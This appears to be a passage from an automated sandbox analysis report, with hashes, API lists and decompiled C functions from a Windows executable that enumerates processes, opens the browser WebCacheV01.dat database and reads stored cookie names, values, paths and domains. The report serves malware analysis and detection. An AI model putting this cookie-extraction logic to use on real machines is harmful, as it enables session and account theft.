                                                                                                                                                0x0040bf7d
                                                                                                                                                0x0040bf90
                                                                                                                                                0x0040bf94
                                                                                                                                                0x0040bf99
                                                                                                                                                0x0040bfa1
                                                                                                                                                0x0040bfa7
                                                                                                                                                0x0040bfa3
                                                                                                                                                0x0040bfa3
                                                                                                                                                0x0040bfa3
                                                                                                                                                0x0040bfb0
                                                                                                                                                0x0040bfbd
                                                                                                                                                0x0040bfd1
                                                                                                                                                0x0040bfe4
                                                                                                                                                0x0040bfe6
                                                                                                                                                0x0040bff2
                                                                                                                                                0x0040bff7
                                                                                                                                                0x0040bff9
                                                                                                                                                0x0040bffb
                                                                                                                                                0x0040c007
                                                                                                                                                0x0040c01a
                                                                                                                                                0x0040c020
                                                                                                                                                0x0040c022
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040bffd
                                                                                                                                                0x0040bffd
                                                                                                                                                0x0040c003
                                                                                                                                                0x0040c005
                                                                                                                                                0x0040c024
                                                                                                                                                0x0040c02b
                                                                                                                                                0x0040c031
                                                                                                                                                0x0040c041
                                                                                                                                                0x0040c043
                                                                                                                                                0x0040c045
                                                                                                                                                0x0040c047
                                                                                                                                                0x0040c049
                                                                                                                                                0x0040c057
                                                                                                                                                0x0040c057
                                                                                                                                                0x0040c05b
                                                                                                                                                0x0040c06c
                                                                                                                                                0x0040c071
                                                                                                                                                0x0040c07c
                                                                                                                                                0x0040c05d
                                                                                                                                                0x0040c066
                                                                                                                                                0x0040c068
                                                                                                                                                0x0040c06a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c06a
                                                                                                                                                0x0040c04b
                                                                                                                                                0x0040c051
                                                                                                                                                0x0040c053
                                                                                                                                                0x0040c055
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c055
                                                                                                                                                0x0040c049
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c005
                                                                                                                                                0x0040c090
                                                                                                                                                0x0040c090
                                                                                                                                                0x0040bf7f
                                                                                                                                                0x0040bf88
                                                                                                                                                0x0040bf8a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040bf8a
                                                                                                                                                0x0040bf7d
                                                                                                                                                0x0040bf40
                                                                                                                                                0x0040bf40
                                                                                                                                                0x0040bf4a
                                                                                                                                                0x0040bf4a
                                                                                                                                                0x0040c09c
                                                                                                                                                0x0040c0a5
                                                                                                                                                0x0040c0ae
                                                                                                                                                0x0040c0b7
                                                                                                                                                0x0040c0bc
                                                                                                                                                0x0040c0bc
                                                                                                                                                0x0040beb4
                                                                                                                                                0x0040beb4
                                                                                                                                                0x0040beb4
                                                                                                                                                0x0040c0c4

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                  • Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                  • Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                  • Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
                                                                                                                                                • EnumResourceTypesW.KERNEL32 ref: 0040BEE6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                • Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                • Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
                                                                                                                                                • Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                • Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D071, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040D071(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryW(L"psapi.dll"); // executed
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[4] = _t14;
					return _t14;
				}
				return _t7;
			}






                                                                                                                                                0x0040d074
                                                                                                                                                0x0040d07c
                                                                                                                                                0x0040d08e
                                                                                                                                                0x0040d099
                                                                                                                                                0x0040d0a5
                                                                                                                                                0x0040d0b1
                                                                                                                                                0x0040d0bd
                                                                                                                                                0x0040d0c9
                                                                                                                                                0x0040d0cc
                                                                                                                                                0x0040d0ce
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d0d1
                                                                                                                                                0x0040d0d2

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,74B059F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2238633743-4233621989
                                                                                                                                                • Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                • Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
                                                                                                                                                • Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                • Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403BAF, Relevance: 19.7, APIs: 4, Strings: 9, Instructions: 192COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				intOrPtr _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				void _v124;
				void _v132;
				void _v136;
				char _v140;
				char _v912;
				char _v936;
				char _v1496;
				char _v1500;
				void* __edi;
				void* __esi;
				void* _t89;
				signed int _t109;
				signed int _t114;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr* _t137;
				intOrPtr* _t139;
				void* _t142;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t151;
				void* _t163;

				_t151 = __edx;
				_v76 = 0x100;
				_v56 = 0x100;
				_v80 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				E00403E49( &_v1500);
				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
				_t164 = _t89;
				if(_t89 == 0) {
					L30:
					E00403E8F( &_v912);
					E00403F55( &_v936);
					E00406710( &_v1496);
					E00406355( &_v72);
					return E00406355( &_v92);
				} else {
					_v12 = 0x20;
					_v20 = 0;
					_v8 = 0;
					_v16 = 0;
					do {
						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
							_t161 =  &_v20;
							_v24 = E004039C1( &_v20, L"Name");
							_v28 = E004039C1( &_v20, L"Value");
							_v32 = E004039C1( &_v20, L"Path");
							_v36 = E004039C1( &_v20, L"RDomain");
							_v48 = E004039C1(_t161, L"Expires");
							_v52 = E004039C1(_t161, L"LastModified");
							_v44 = E004039C1(_t161, L"EntryId");
							_v40 = E004039C1(_t161, L"Flags");
							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
								_t109 = memset( &_v136, 0, 0x2c);
								_t163 = _t163 + 0xc;
								E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
								E0040518A( &_v92, _v36);
								_t114 = _v92;
								_v112 = 0x40f454;
								if(_t114 != 0) {
									_v112 = _t114;
								}
								E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
								E0040518A( &_v72, _v32);
								_t119 = _v72;
								_v116 = 0x40f454;
								if(_t119 != 0) {
									_v116 = _t119;
								}
								_t120 = _v24;
								_t147 =  *((intOrPtr*)(_t120 + 0x328));
								if(_t147 <= 0) {
									_v108 = 0x40f924;
								} else {
									_t139 = _t120 + 0x220;
									 *((char*)(_t147 +  *_t139 - 1)) = 0;
									_v108 =  *_t139;
								}
								_t121 = _v28;
								_t148 =  *((intOrPtr*)(_t121 + 0x328));
								if(_t148 <= 0) {
									_v104 = 0x40f924;
								} else {
									_t137 = _t121 + 0x220;
									 *((char*)( *_t137 + _t148 - 1)) = 0;
									_v104 =  *_t137;
								}
								_t122 = _v48;
								if(_t122 != 0) {
									memcpy( &_v132, _t122 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t123 = _v52;
								if(_t123 != 0) {
									memcpy( &_v124, _t123 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t124 = _v40;
								if(_t124 != 0) {
									_v96 =  *((intOrPtr*)(_t124 + 0x220));
								}
								_t125 = _v44;
								if(_t125 == 0) {
									_v140 = 0;
									_v136 = 0;
								} else {
									_v140 =  *((intOrPtr*)(_t125 + 0x220));
									_v136 =  *((intOrPtr*)(_t125 + 0x224));
								}
								_v100 = _a8;
								 *((intOrPtr*)( *_a4))( &_v140); // executed
							}
						}
					} while (E0040489D( &_v1500) != 0);
					if(_v20 != 0) {
						free(_v20);
					}
					goto L30;
				}
			}


























































                                                                                                                                                0x00403baf
                                                                                                                                                0x00403bc1
                                                                                                                                                0x00403bc4
                                                                                                                                                0x00403bce
                                                                                                                                                0x00403bd1
                                                                                                                                                0x00403bd4
                                                                                                                                                0x00403bd7
                                                                                                                                                0x00403bda
                                                                                                                                                0x00403bdd
                                                                                                                                                0x00403be0
                                                                                                                                                0x00403be3
                                                                                                                                                0x00403be6
                                                                                                                                                0x00403bfc
                                                                                                                                                0x00403c01
                                                                                                                                                0x00403c03
                                                                                                                                                0x00403e11
                                                                                                                                                0x00403e17
                                                                                                                                                0x00403e22
                                                                                                                                                0x00403e2d
                                                                                                                                                0x00403e35
                                                                                                                                                0x00403e46
                                                                                                                                                0x00403c09
                                                                                                                                                0x00403c09
                                                                                                                                                0x00403c10
                                                                                                                                                0x00403c13
                                                                                                                                                0x00403c16
                                                                                                                                                0x00403c19
                                                                                                                                                0x00403c2b
                                                                                                                                                0x00403c36
                                                                                                                                                0x00403c43
                                                                                                                                                0x00403c50
                                                                                                                                                0x00403c5d
                                                                                                                                                0x00403c6a
                                                                                                                                                0x00403c77
                                                                                                                                                0x00403c84
                                                                                                                                                0x00403c91
                                                                                                                                                0x00403c9c
                                                                                                                                                0x00403c9f
                                                                                                                                                0x00403cca
                                                                                                                                                0x00403ccf
                                                                                                                                                0x00403cde
                                                                                                                                                0x00403ce8
                                                                                                                                                0x00403ced
                                                                                                                                                0x00403cf2
                                                                                                                                                0x00403cf5
                                                                                                                                                0x00403cf7
                                                                                                                                                0x00403cf7
                                                                                                                                                0x00403d01
                                                                                                                                                0x00403d0b
                                                                                                                                                0x00403d10
                                                                                                                                                0x00403d15
                                                                                                                                                0x00403d18
                                                                                                                                                0x00403d1a
                                                                                                                                                0x00403d1a
                                                                                                                                                0x00403d1d
                                                                                                                                                0x00403d20
                                                                                                                                                0x00403d28
                                                                                                                                                0x00403d3c
                                                                                                                                                0x00403d2a
                                                                                                                                                0x00403d2a
                                                                                                                                                0x00403d31
                                                                                                                                                0x00403d37
                                                                                                                                                0x00403d37
                                                                                                                                                0x00403d43
                                                                                                                                                0x00403d46
                                                                                                                                                0x00403d4e
                                                                                                                                                0x00403d62
                                                                                                                                                0x00403d50
                                                                                                                                                0x00403d50
                                                                                                                                                0x00403d57
                                                                                                                                                0x00403d5d
                                                                                                                                                0x00403d5d
                                                                                                                                                0x00403d69
                                                                                                                                                0x00403d6e
                                                                                                                                                0x00403d7c
                                                                                                                                                0x00403d81
                                                                                                                                                0x00403d81
                                                                                                                                                0x00403d84
                                                                                                                                                0x00403d89
                                                                                                                                                0x00403d97
                                                                                                                                                0x00403d9c
                                                                                                                                                0x00403d9c
                                                                                                                                                0x00403d9f
                                                                                                                                                0x00403da4
                                                                                                                                                0x00403dac
                                                                                                                                                0x00403dac
                                                                                                                                                0x00403daf
                                                                                                                                                0x00403db4
                                                                                                                                                0x00403dd0
                                                                                                                                                0x00403dd6
                                                                                                                                                0x00403db6
                                                                                                                                                0x00403dc2
                                                                                                                                                0x00403dc8
                                                                                                                                                0x00403dc8
                                                                                                                                                0x00403de8
                                                                                                                                                0x00403dee
                                                                                                                                                0x00403dee
                                                                                                                                                0x00403c9f
                                                                                                                                                0x00403dfb
                                                                                                                                                0x00403e06
                                                                                                                                                0x00403e0b
                                                                                                                                                0x00403e10
                                                                                                                                                0x00000000
                                                                                                                                                0x00403e06

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F
                                                                                                                                                  • Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0
                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B
                                                                                                                                                  • Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA
                                                                                                                                                • memset.MSVCRT ref: 00403CCA
                                                                                                                                                  • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                  • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                • memcpy.MSVCRT ref: 00403D7C
                                                                                                                                                • memcpy.MSVCRT ref: 00403D97
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcslen
                                                                                                                                                • String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
                                                                                                                                                • API String ID: 4182952938-1692241855
                                                                                                                                                • Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                • Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
                                                                                                                                                • Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                • Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004039F6, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E004039F6(void* __eax) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v52;
				void _v578;
				int _v580;
				void _v1106;
				long _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				signed short _t48;
				int _t55;
				void* _t60;
				signed int _t63;
				void* _t77;
				void* _t94;
				signed short* _t100;
				void* _t102;

				_t102 = __eax;
				_t44 =  *((intOrPtr*)(__eax + 0x63c));
				_t100 = __eax + 0x430;
				_v8 = 0;
				 *_t100 = 0;
				if(_t44 != 1) {
					__eflags = _t44 - 2;
					if(__eflags == 0) {
						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
						__eflags = _t48;
						if(_t48 == 0) {
							_v8 =  *((intOrPtr*)(_t102 + 0x418));
						}
					}
					L15:
					return _v8;
				}
				_v580 = 0;
				memset( &_v578, 0, 0x208);
				_v1108 = _v1108 & 0x00000000;
				memset( &_v1106, 0, 0x208);
				E0040DACC( &_v1108, 0); // executed
				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				_t12 = wcslen( &_v1108) + 1; // 0x1
				if(_t55 + _t12 >= 0x104) {
					_t15 =  &_v580;
					 *_t15 = _v580 & 0x00000000;
					__eflags =  *_t15;
				} else {
					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				}
				_t60 = E004057D1( &_v580);
				_t109 = _t60;
				_pop(_t94);
				if(_t60 == 0) {
					_v8 = 0xfffffffd;
				} else {
					_t90 = _t102 + 4;
					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
					_t110 = _t63;
					if(_t63 == 0) {
						_v20 = _v20 & _t63;
						_v16 = _v16 & _t63;
						_v12 = 0x1388;
						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
						E00406264( &_v52, _t94, L"taskhost.exe");
						E00406264( &_v52, _t94, L"taskhostex.exe");
						E00406264( &_v52, _t94, L"taskhostw.exe");
						E0040567E(_t100, L"ecv"); // executed
						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
						_t111 = _t77;
						_push(_t100);
						if(_t77 == 0) {
							_v8 = 0xfffffffe;
							DeleteFileW(??);
							 *_t100 =  *_t100 & 0x00000000;
							__eflags =  *_t100;
						} else {
							if(E00403FDE(_t90, _t111) == 0) {
								_v8 =  *((intOrPtr*)(_t102 + 0x418));
							}
						}
						E0040623E( &_v52);
						E00406710( &_v20);
					}
				}
			}
























                                                                                                                                                0x00403a01
                                                                                                                                                0x00403a03
                                                                                                                                                0x00403a0f
                                                                                                                                                0x00403a15
                                                                                                                                                0x00403a18
                                                                                                                                                0x00403a1b
                                                                                                                                                0x00403b86
                                                                                                                                                0x00403b89
                                                                                                                                                0x00403b95
                                                                                                                                                0x00403b9a
                                                                                                                                                0x00403b9c
                                                                                                                                                0x00403ba4
                                                                                                                                                0x00403ba4
                                                                                                                                                0x00403b9c
                                                                                                                                                0x00403ba7
                                                                                                                                                0x00403bae
                                                                                                                                                0x00403bae
                                                                                                                                                0x00403a2f
                                                                                                                                                0x00403a36
                                                                                                                                                0x00403a3b
                                                                                                                                                0x00403a50
                                                                                                                                                0x00403a5e
                                                                                                                                                0x00403a68
                                                                                                                                                0x00403a7c
                                                                                                                                                0x00403a86
                                                                                                                                                0x00403aa3
                                                                                                                                                0x00403aa3
                                                                                                                                                0x00403aa3
                                                                                                                                                0x00403a88
                                                                                                                                                0x00403a9a
                                                                                                                                                0x00403aa0
                                                                                                                                                0x00403ab2
                                                                                                                                                0x00403ab7
                                                                                                                                                0x00403ab9
                                                                                                                                                0x00403aba
                                                                                                                                                0x00403b7d
                                                                                                                                                0x00403ac0
                                                                                                                                                0x00403ac6
                                                                                                                                                0x00403acc
                                                                                                                                                0x00403ad1
                                                                                                                                                0x00403ad3
                                                                                                                                                0x00403ad9
                                                                                                                                                0x00403adc
                                                                                                                                                0x00403ae2
                                                                                                                                                0x00403af3
                                                                                                                                                0x00403b00
                                                                                                                                                0x00403b0d
                                                                                                                                                0x00403b1a
                                                                                                                                                0x00403b24
                                                                                                                                                0x00403b3a
                                                                                                                                                0x00403b3f
                                                                                                                                                0x00403b41
                                                                                                                                                0x00403b42
                                                                                                                                                0x00403b5a
                                                                                                                                                0x00403b61
                                                                                                                                                0x00403b67
                                                                                                                                                0x00403b67
                                                                                                                                                0x00403b44
                                                                                                                                                0x00403b4d
                                                                                                                                                0x00403b55
                                                                                                                                                0x00403b55
                                                                                                                                                0x00403b4d
                                                                                                                                                0x00403b6e
                                                                                                                                                0x00403b76
                                                                                                                                                0x00403b76
                                                                                                                                                0x00403ad3

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403A36
                                                                                                                                                • memset.MSVCRT ref: 00403A50
                                                                                                                                                  • Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                • wcslen.MSVCRT ref: 00403A68
                                                                                                                                                • wcslen.MSVCRT ref: 00403A77
                                                                                                                                                  • Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
                                                                                                                                                  • Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
                                                                                                                                                • API String ID: 2175868439-3212516833
                                                                                                                                                • Opcode ID: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
                                                                                                                                                • Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
                                                                                                                                                • Opcode Fuzzy Hash: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
                                                                                                                                                • Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E0A4, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				signed int _t49;
				signed int _t51;
				int _t53;
				int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				int _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t67;
				signed int _t71;
				int _t72;
				void* _t73;
				intOrPtr _t81;

				_t67 = __edx;
				_push(0x70);
				_push(0x40f3f0);
				E0040E2B8(__ebx, __edi, __esi);
				_t35 = GetModuleHandleA(0);
				if(_t35->i != 0x5a4d) {
					L4:
					 *(_t73 - 0x1c) = 0;
				} else {
					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
					if( *_t66 != 0x4550) {
						goto L4;
					} else {
						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
						if(_t57 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t58 = 0;
								__eflags =  *(_t66 + 0xe8);
								goto L9;
							}
						} else {
							if(_t57 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t58 = 0;
									__eflags =  *(_t66 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t73 - 4) = 0;
				_t61 = 2;
				__set_app_type(_t61);
				 *0x413700 =  *0x413700 | 0xffffffff;
				 *0x413704 =  *0x413704 | 0xffffffff;
				_t37 = __p__fmode();
				_t63 =  *0x41238c; // 0x0
				 *_t37 = _t63;
				_t38 = __p__commode();
				_t64 =  *0x412388; // 0x0
				 *_t38 = _t64;
				 *0x4136fc =  *_adjust_fdiv;
				_t41 = E0040E2B2();
				_t81 =  *0x412000; // 0x1
				if(_t81 == 0) {
					__setusermatherr(E0040E2B2);
					_pop(_t64);
				}
				E0040E2A0(_t41);
				L0040E29A();
				_t43 =  *0x412384; // 0x0
				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
				_t47 = _t73 - 0x2c;
				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
				_push(0x40f3bc);
				_push(0x40f394); // executed
				L0040E29A(); // executed
				_t71 =  *__imp___wcmdln;
				if(_t71 != 0) {
					 *(_t73 - 0x34) = _t71;
					__eflags =  *_t71 - 0x22;
					if( *_t71 != 0x22) {
						while(1) {
							__eflags =  *_t71 - 0x20;
							if( *_t71 <= 0x20) {
								goto L19;
							}
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
						}
					} else {
						while(1) {
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
							_t56 =  *_t71;
							__eflags = _t56;
							if(_t56 == 0) {
								break;
							}
							__eflags = _t56 - 0x22;
							if(_t56 != 0x22) {
								continue;
							}
							break;
						}
						__eflags =  *_t71 - 0x22;
						if( *_t71 == 0x22) {
							L18:
							_t71 = _t71 + _t61;
							__eflags = _t71;
							 *(_t73 - 0x34) = _t71;
						}
					}
					L19:
					_t49 =  *_t71;
					__eflags = _t49;
